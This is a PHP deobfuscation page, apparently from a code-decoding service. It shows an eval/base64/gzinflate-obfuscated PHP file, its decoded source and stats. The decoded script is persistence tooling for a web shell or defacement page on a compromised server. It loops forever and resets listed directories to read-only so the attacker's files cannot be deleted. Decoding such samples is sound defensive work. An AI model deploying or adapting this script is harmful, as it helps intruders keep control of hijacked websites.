Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $enc = '=IWlkfc22I2D/cs2xdM92vQEOJ4M754/W3DaNBdETz815yGwmL5zQkVitC1hyDOG/EnDlXrhhTT..

Decoded Output download

?>b'<?php

/**
 * SCRIPT INI DI BUAT OLEH Eclipse Security Labs Team
 * Digunakan untuk memastikan keamanan file/folder landing page atau shell terkunci [ tidak bisa terhapus. ] 
 */

set_time_limit(0);
$expectedPerms = \'0555\';
$interval = 1;
$jsonFilePath = \'./config.json\';
function getPathsFromJson($jsonFilePath) {
    if (!file_exists($jsonFilePath)) {
        echo "File config json nya ga ada cok $jsonFilePath
";
        return [];
    }
    $jsonContent = file_get_contents($jsonFilePath);
    $data = json_decode($jsonContent, true);

    if (json_last_error() !== JSON_ERROR_NONE) {
        echo "Error: format nya benerin dulu - " . json_last_error_msg() . "
";
        return [];
    }

    return isset($data[\'path\']) && is_array($data[\'path\']) ? $data[\'path\'] : [];
}
function restorePermissions($dir, $expectedPerms) {
    if (!is_dir($dir)) {
        echo "Error: $dir bukan direktori.
";
        return;
    }
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($iterator as $file) {
        $path = $file->getPathname();
        $currentPerms = substr(sprintf(\'%o\', $file->getPerms()), -4);
        if ($currentPerms !== $expectedPerms) {
            if (chmod($path, octdec($expectedPerms))) {
                echo "Ada Yang mau tikung ni, udah gue ubah $path dari $currentPerms ke $expectedPerms
";
            } else {
                echo "gagal cok $path
";
            }
        }
    }
}
while (true) {
    $dirsToMonitor = getPathsFromJson($jsonFilePath);

    if (empty($dirsToMonitor)) {
        echo "directory nya mana anjir.
";
        break;
    }
    foreach ($dirsToMonitor as $dir) {
        restorePermissions($dir, $expectedPerms);
    }
    sleep($interval);
}'

Did this file decode correctly?

Original Code

<?php
$enc = '=IWlkfc22I2D/cs2xdM92vQEOJ4M754/W3DaNBdETz815yGwmL5zQkVitC1hyDOG/EnDlXrhhTTNYr7aVgpVg96YoZxPlLqoXWi/5hu+7wNb/IXsH6Wx+BjcHfsaZrhmt/HFnLnxtFh4g08n8SrpA4qSpZyxrA2mVjWlIXU3QhuLBbBRxQuNHIKl0Rr0S/AaMbz0N6/8JBXCulxf5l5aQ0MDPAi9JXJky7MIjW3sm6HnypraNH3uuyLnew78YgTfV3u3FdfWsoc8FMNFttgt9yU3EVUAoQXvazLynJZi94m8zJlzaKanBFXtxf8QcZfbwGzBRufUGvB4vaDdRPs+Zg7PJExsbbt38+cm98XrRfe2zPvi2w8GKR/Sco4qB0zXkWgga6uBf26s55rWRTM/aB6NTVA/KZgpEYOvBJX14qy7o7IKMdyQjUXhGeqE+CLa7GYKEiHokq58mMY1KoxVClk3FhO6XZC1o4SNPe9KODghH2rVVznU5ePJHd0B96O4o2y13ZlVRQM0FumDou0z4Dn+BQEdPzd5hSfIAzZLNFaCJEFKXIoyuJjrldoPHOQzHBW8Tec9yQX6DufG2kG8XcxBHgprUh6+eUqNlUaboTXWGdQquzKi5ZQI5PNug0BSON+aOZnoU9hvUaTZRBl0pOVlxl2Vr6xyftLuJZFNo0Bbf/gL4jDaTkYOPMAiHWBysgjKqM4pDdIODeQuCvXB6aDhf8hRueAYLFB6UaK/eYrGJj0nnV5QSfgGRkgcj8QKsklwdWfELdJIT3Pgs30y0VWIL35D3z9rESp8+5VSIMtrzO7sL7Og4mWlFxLMgBGU4rz92/meeNcCROF9yMCfoZtMqf3CDytPqL88a4k5EySCkLCM7AYgVmIVYkipxA9WGCuQ8QREQG6lpUAR0MvLemCFwmuLYIUQ4Y01ZYIQbqhVJAnnKh8idppV5xxwChvbKwcJYhhZREaRIBiw+wA3YO3lveYweg7IGzYObPqpuycMB/+7f4Rnv3+7szVR3vd8Z682Zyc9izvCTyWa7kVn/DVjCYvt9G7eTgt2KXZAhXiUKRARaTFFp0nEKk2VZFqVY+H1v2HEANtbbXVjciH/GPQOBwJe8v7AEFA/2OQSBwfsD4UA';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>

Function Calls

strrev 1
gzinflate 3
gzuncompress 2
base64_decode 3

Variables

$enc =IWlkfc22I2D/cs2xdM92vQEOJ4M754/W3DaNBdETz815yGwmL5zQkVitC1h..

Stats

MD5 6334b037c24056d47bb1728932f171c6
Eval Count 2
Decode Time 89 ms